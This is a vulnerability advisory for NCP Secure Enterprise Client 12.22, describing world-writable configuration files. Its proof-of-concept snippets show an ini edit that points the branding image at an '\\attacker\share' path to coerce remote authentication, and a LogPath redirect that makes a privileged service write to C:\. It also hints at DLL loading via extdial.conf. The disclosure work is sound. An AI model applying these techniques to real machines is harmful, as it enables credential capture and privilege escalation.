usd-2022-0004 | NCP Secure Enterprise Client - Insecure File Permissions

Advisory ID: usd-2022-0004
Product: NCP Secure Enterprise Client
Affected Version: 12.22
Vulnerability Type: Insecure File Permissions
Security Risk: Medium
Vendor URL: https//www.ncp-e.com/
Vendor Status: Fixed

Description

The NCP Secure Enterprise client is a VPN and networking application that is utilized by many organisations to connect workstations
to the cooperate network. The client stores it's configuration files within the directory C:\\ProgramData\\NCP\\SecureClient, which grants
low privileged user accounts write access to most resources. Attackers can abuse this configuration in different ways as demonstrated
in the Proof of Concept section below:

Proof of Concept

This section contains proof of concepts for some of the writable resources:

cacerts

Since the folder C:\\ProgramData\\NCP\\SecureClient\\cacerts is writable for low privileged user accounts, it is possible to add new CA
certificates that may allow connections to untrusted endpoints:

cbo.ini

The file C:\\ProgramData\\NCP\\SecureClient\\config\\cbo.ini is also writable for low privileged user accounts. This file
can be used to configure custom branding of the NCP Secure Enterprise client by specifying the path to the desired theme
files. By specifying the address of a network share instead, it is possible to coerce a remote authentication by each user
that logs in on the prepared workstation. Furthermore, since the NCP Secure Enterprise client starts on startup, an remote
authentication of the machine account can be coerced.

[GENERAL]
Enabled=1[DEUTSCH]
Picture=\\\\attacker\\share\\test.png
HtmlLocal=%BaseDataDir%\\CustomBrandingOption\\de\\bla.html[ENGLISH]
Picture=\\\\attacker\\share\\test.png
HtmlLocal=%BaseDataDir%\\CustomBrandingOption\\en\\bla.html

ncpmon.ini

The file C:\\ProgramData\\NCP\\SecureClient\\config\\ncpmon.ini contains several different configuration settings.
One of them is the LogPath setting within the Gina section. Since the file is writable by low privileged user
accounts, it is possible to set the LogPath to an arbitrary directory.

[GENERAL]
...SNIP...[GINA]
DisableGinaClient=0
LogLevel=9
LogPath=C:\\

The configuration is then used by a high privileged service to write into the corresponding location:

C:\\>dir
Datenträger in Laufwerk C: ist Windows Verzeichnis von C:\\ 05.05.2021 10:09 <DIR> Program Files
05.05.2021 10:09 <DIR> Program Files (x86)
05.05.2021 10:09 <DIR> Users
05.05.2021 10:09 <DIR> Windows
30.11.2021 10:51 1.960.248 NcpGinaLog.txt

Apart form the above mentioned issues, other attacks may be possible. The file extdial.conf contains e.g.
the filenames of dynamic linked library (DLL) files which could may lead to privilege escalation vulnerabilities
on certain setups.

Fix

The contents of the configuration folder should be reviewed and more restrictive permissions should be applied
to files that store sensitive configuration items. Low privileged user accounts should only be allowed to modify
configuration options that do not affect the security of the operating system.

References

  • https://www.ncp-e.com/
  • https://github.com/usdAG/SharpLink

Timeline

  • 2022-02-02 First contact request via info-mv@ncp-e.com
  • 2022-02-02 Advisory transfered to the vendor
  • 2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
  • 2022-06-09 Responsible Disclosure Team requests an update
  • 2022-06-21 Vendor annouces a new software release available in August
  • 2022-08-31 NCP Secure Enterprise Client 13.10 is released
  • 2023-03-03 This advisory is published

Credits

These security vulnerabilities were found by Tobias Neitzel.